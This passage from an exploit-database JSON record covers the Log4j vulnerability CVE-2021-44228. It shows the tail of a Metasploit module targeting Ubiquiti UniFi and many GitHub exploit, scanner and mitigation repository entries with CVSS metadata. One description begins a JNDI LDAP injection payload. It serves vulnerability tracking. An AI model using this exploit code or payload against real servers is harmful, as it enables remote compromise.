\n \nmsg = res.get_json_document.dig('meta', 'msg') \nif res.code == 400 && msg == 'api.err.Invalid' # returned by versions before 5.13.29 \nfail_with(Failure::NotVulnerable, 'The target is not vulnerable') \nend \n \nunless res.code == 400 && msg == 'api.err.InvalidPayload' # returned by versions after 5.13.29 (including patched ones) \nfail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') \nend \n \nwait_until { @search_received && (!handler_enabled? || session_created?) } \nhandler \nensure \ncleanup \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/165673/ubiquiti_unifi_log4shell.rb.txt"}], "githubexploit": [{"lastseen": "2023-05-23T17:35:26", "description": "# Log4Shell Honeypot\n\nThis demo application is vulnerable to the...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T10:32:39", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], 
"modified": "2022-04-03T03:58:01", "id": "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-18T14:46:06", "description": "# RS4LOGJ-CVE-2021-44228\n## Apache Log4j ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-28T13:32:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-28T13:50:33", "id": "4A0D603B-6526-5D1E-BADC-55B4775C354B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:13:55", "description": "# aws-log4j-mitigations\n\nMitigations ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T08:01:55", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T08:05:42", "id": "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T09:04:38", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T20:08:57", "description": "# CVE-2021-44228\n\nAn attacker who can control log messages or lo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T18:03:50", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T17:53:14", "id": "30C6DF99-400E-539F-AA8D-39E7407F4796", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-01T15:06:25", "description": "# log4j-fuzzer\n## For Single Target \n```bash\nchmod +x log4j\n```\n...", "cvss3": {"exploitabilityScore": 
3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-08T00:28:32", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-01T12:41:00", "id": "E9DFB8EA-B99D-5022-ACE6-5A42D0D6A350", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:15:16", "description": "# CVE-2021-44228-quickfix-script\nUse environment variable to dis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-12T04:17:08", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T05:19:16", "id": "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-03-20T18:11:07", "description": "<!doctype html><html lang=\"pt\" dir=\"ltr\"><head><base href=\"https...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T22:52:02", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-03-14T11:35:57", "id": 
"C640B511-D1E9-5F57-964D-3826F1C68DF8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-11T02:07:56", "description": "# CVE-2021-44228-test\n\nwysylasz `${jndi:ldap:...", "cvss3": {}, "published": "2021-12-10T15:39:09", "type": "githubexploit", "title": "Exploit for CVE-2021-44228", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:43:39", "id": "780AD920-FF08-55C6-84C8-A8536C6F5527", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2021-12-27T08:07:19", "description": "# Log4j_Attacker_IPList\nCVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T06:29:12", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T06:34:21", "id": "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": 
"2023-04-26T18:07:03", "description": "# CVE-2021-44228-ScannersListFromRF\n\nIn light with a huge amount...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T10:34:48", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-09T08:14:37", "id": "9D8C431A-57F3-560C-8146-1232C2C029C2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-22T16:51:26", "description": "# CVE-2021-44228-Mass-RCE\nCVE-2021-44228 Mass Exploitation tool ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-18T09:16:05", "type": 
"githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-22T13:16:14", "id": "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-19T17:21:20", "description": "# Log4j\nThe Log4j Vulnerability (CVE-2021-44228), also known as ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-19T13:49:40", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-19T14:30:24", "id": "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-17T15:41:48", "description": "# jndiRep - CVE-2021-44228\nBasically a **bad** grep on even **wo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T12:25:08", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-24T11:13:49", "id": "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:32:54", "description": "# Log4j-CVE-2021-44228\n<img src=\"2021-12-13_20-41.png\">\n\nMass Ch...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T13:30:57", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:34:04", "id": "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-18T14:09:25", "description": "# Spring Boot Log4j - CVE-2021-44228\n\nThe Log4Shell vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T12:50:28", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-18T12:50:40", "id": "C7EE8D86-B287-50F5-B8C2-05E11E510900", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:28:05", "description": "# Searchable Log4j database\n Searchable page for [CISA Log4j (CV...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-01-04T03:37:03", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-17T00:21:21", "id": "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T00:36:30", "description": "# log4j-vul\nThis project is just to show Apache Log4j2 Vulnerabi...", "cvss3": {"cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-15T05:19:13", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T04:39:30", "id": "63500AE8-A10A-5388-B314-001A4CFBDFBD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T01:08:28", "description": "# log4j-shell-poc\nA Proof-Of-Concept for the recently found CVE-...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-09-21T07:43:15", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-09-21T09:04:17", "id": "6E4D24C6-CAF4-5CCB-83A7-844F830C86FC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:36", "description": "### Usage...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-11T09:52:36", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-06-20T16:41:33", "id": "94966928-86D4-5285-9A57-CBDD8F2EF438", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:14", 